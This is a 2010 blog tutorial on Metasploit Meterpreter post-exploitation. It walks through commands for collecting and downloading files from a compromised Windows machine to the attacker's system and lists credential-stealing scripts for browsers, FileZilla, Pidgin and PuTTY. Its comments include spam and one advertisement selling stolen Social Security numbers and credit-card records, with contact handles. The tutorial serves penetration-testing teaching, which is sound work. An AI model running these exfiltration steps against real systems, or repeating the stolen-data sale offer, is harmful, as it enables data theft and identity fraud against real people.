Wednesday 27 October 2010

Post-exploitation: Downloading files from a victim with Metasploit Meterpreter scripts

Imagine you have compromised a target system as part of a Penetration test. Additionally, as part of the pen-test you need to download some files, both as proof of the compromise, and also to use the collected data from this system to assist in further exploitation of other systems.

Here I discuss options for how files can be downloaded using the Metasploit Meterpreter console, and using Meterpreter scripts to speed up the process.

I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.

You are heir to your actions, make sure that everything you do is ethical, and use these techniques for good purposes.

We will skip the exploitation phase in these examples, to focus on the post-exploitation and data collection aspects.

So, we have exploited a system, and find ourselves at friendly Meterpreter console prompt.




The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.


Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:



Let's look at "run file_collector" first:

In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

OPTIONS:

    -d   Directory to start search on, search will be recursive.
    -f   Search blobs separated by a |.
    -h        Help menu.
    -i   Input file with list of files to download, one per line.
    -l   Location where to save the files.
    -o   Output File to save the full path of files found.
    -r        Search subdirectories.


meterpreter >


As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.





Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

cat /root/Courses/CforLinux/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)



Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/

 



There we go, and that was a very quick way to download all the files I needed.

Other scripts for data collection


There are a whole host of data collection scripts that you can try, including the following:

scraper, credcollect, get_filezilla_creds, dumplinks, get_pidgin_creds, enum_chrome, enum_firefox, enum_putty, winenum

...and if you are feeling adventurous you could create your own scripts. (Maybe a blog for another time)

Mitigations

  • There aren't really any mitigations for these examples. If the exploitation has got this far, it is basically game-over.
  • Deploying a layered security program, using "Defense in depth" can reduce the risk of the initial exploitation.

18 comments:

  1. Replies
    1. Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download Now

      >>>>> Download Full

      Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download LINK

      >>>>> Download Now

      Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download Full

      >>>>> Download LINK 5x

      Delete
  2. iam not able run File System Commands on meterpreter only core commands are showen please help

    ReplyDelete
  3. iam not able run File System Commands on meterpreter only core commands are showen please help

    ReplyDelete
  4. I Find it very informative about marketing.Thanks for sharing such great information. hope you keep sharing such kind of information Data copy tool

    ReplyDelete
  5. These stunning, beautifully designed medical PowerPoint templates Backgrounds will clearly communicate your medical ideas and thoughts.

    ReplyDelete
  6. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  7. Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download Now

    >>>>> Download Full

    Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download LINK

    >>>>> Download Now

    Insidetrust.Com: Post-Exploitation: Ing Files From A Victim With Metasploit Meterpreter Scripts >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  8. Wow that's a great article thanks for that information I have also write like that visit here

    ReplyDelete
  9. latestupdatedtricks.com

    ReplyDelete